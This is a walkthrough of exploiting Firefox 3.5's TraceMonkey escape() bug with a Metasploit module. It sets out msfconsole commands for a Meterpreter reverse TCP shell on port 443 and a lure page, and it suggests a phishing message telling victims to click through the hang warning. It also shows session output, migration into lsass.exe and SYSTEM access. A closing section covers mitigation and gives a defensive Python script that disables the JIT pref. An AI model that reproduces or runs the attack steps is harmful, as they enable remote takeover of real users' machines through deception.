Firefox 3.5 escape() Return Value Memory Corruption Metasploit Exploit
Metasploit has released an exploit for Mozilla Firefox 3.5 that targets TraceMonkey, the JIT component of Firefox's JavaScript engine. The bug is tracked in Mozilla's Bugzilla as bug 503286. The first public exploit appeared on Milw0rm, written by SBerry (Simon Berry-Byrne), who credits HD for helping with the exploit code; HD later converted it into a Metasploit module. The exploit itself is JavaScript generated with the selected payload and then encoded to make detection by HIPS, IPS and IDS systems more difficult. One way to use this module is to run msfconsole as root so that low ports can be used for our listeners:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
[sudo] password for carlos:

[msfconsole ASCII banner]

       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux

msf >
We then select the exploit and a Meterpreter reverse TCP shell:
msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
We take a look at the options available:
msf exploit(firefox_escape_retval) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Firefox 3.5.0 on Windows XP SP0-SP3
A recommended way of attacking would be to set the exploit's port to 80, the default port for HTTP, which is the protocol we will use to exploit the browser; we also set a friendly URI path:
msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH secret.html
URIPATH => secret.html
For the payload we set the local host from which we are launching the attack and to which we want the target to connect back. We choose port 443, the default port for HTTPS, since the chances of this port being open in most environments are high:
msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(firefox_escape_retval) > set LPORT 443
LPORT => 443
Now the exploit is run and it will listen for the target's connection:
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secret.html
[*] Local IP: http://192.168.1.158:80/secret.html
[*] Server started.
We craft our email or other message for the target to read and inform them that they might get a popup stating that the script appears to have hung, and to just click continue since this is normal. The message that appears on the target will be similar to this:
When the client clicks on the link, the exploit is delivered together with the payload:
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.139:1046...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:443 -> 192.168.1.139:1047)
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
Since the browser window will hang and might be closed by the target, it is important to migrate out of that process as quickly as possible, so we run the migrate script:
meterpreter > run migrate
[*] Migrating to lsass.exe...
[*] Current server process: firefox.exe (1800)
[*] New server process: lsass.exe (684)
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
This exploit differs from the latest ones made public for IE ActiveX controls in that it may require some additional steps on the target system before a shell comes back. At the time of this writing the exploit only works on Windows XP SP0 to SP3 with Firefox 3.5.0, and in testing it did not work 100% of the time: several tries were needed on some of the lab machines while others worked on the first try.
A way to mitigate this attack would be to open about:config from the Firefox address bar and change the javascript.options.jit.content parameter, or simply to use the NoScript add-on. Mitigation in a large enterprise will be difficult because this setting cannot be pushed to clients through a GPO (Group Policy Object); a logon script is one of the alternatives that will have to be used to reduce the risk.
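The about:config change above comes down to setting javascript.options.jit.content to false (Firefox 3.5 ships with it enabled). As an added example, not code from the original post, the following Python audits a profile's prefs.js for that pref, rewrites it with the pref forced off, and produces a mozilla.cfg lockPref body that a logon script could drop next to the Firefox binary so users cannot flip it back; the sample prefs.js is constructed, and the deployment comment text is an assumption.

```python
import re

PREF_NAME = "javascript.options.jit.content"

# Constructed sample of a Firefox 3.5 profile's prefs.js; not taken from a real machine.
SAMPLE_PREFS = """# Mozilla User Preferences
user_pref("browser.startup.homepage", "about:blank");
user_pref("javascript.options.jit.content", true);
user_pref("javascript.options.jit.chrome", true);
"""

# Matches user_pref/pref/lockPref lines: quoted name, then the value up to ");".
_PREF_RE = re.compile(r'^\s*(?:user_pref|pref|lockPref)\(\s*"([^"]+)"\s*,\s*(.+?)\s*\);\s*$')

def parse_prefs(text):
    """Map every pref name in a prefs.js / user.js / mozilla.cfg body to its raw value."""
    prefs = {}
    for line in text.splitlines():
        match = _PREF_RE.match(line)
        if match:
            prefs[match.group(1)] = match.group(2)
    return prefs

def content_jit_enabled(text):
    """True when the TraceMonkey content JIT is on. Firefox 3.5 ships the pref as true,
    so a profile that never wrote it is still exposed; only an explicit false counts."""
    value = parse_prefs(text).get(PREF_NAME)
    return value is None or value.strip().lower() != "false"

def harden_prefs(text):
    """Return the prefs text with the content JIT pref forced to false: an existing line
    is rewritten in place, otherwise one is appended; every other pref is left as it was."""
    fixed = 'user_pref("%s", false);' % PREF_NAME
    lines, replaced = [], False
    for line in text.splitlines():
        match = _PREF_RE.match(line)
        if match and match.group(1) == PREF_NAME:
            lines.append(fixed)
            replaced = True
        else:
            lines.append(line)
    if not replaced:
        lines.append(fixed)
    return "\n".join(lines) + "\n"

def mozilla_cfg():
    """Body of a mozilla.cfg that locks the pref so users cannot flip it back in about:config.
    Firefox ignores the first line of mozilla.cfg, so it must be a comment (hypothetical text)."""
    return '// locked prefs (hypothetical logon-script deployment)\nlockPref("%s", false);\n' % PREF_NAME
```

Point parse_prefs and content_jit_enabled at each user's prefs.js to find exposed profiles, and write mozilla_cfg() out from the logon script to lock the setting fleet-wide.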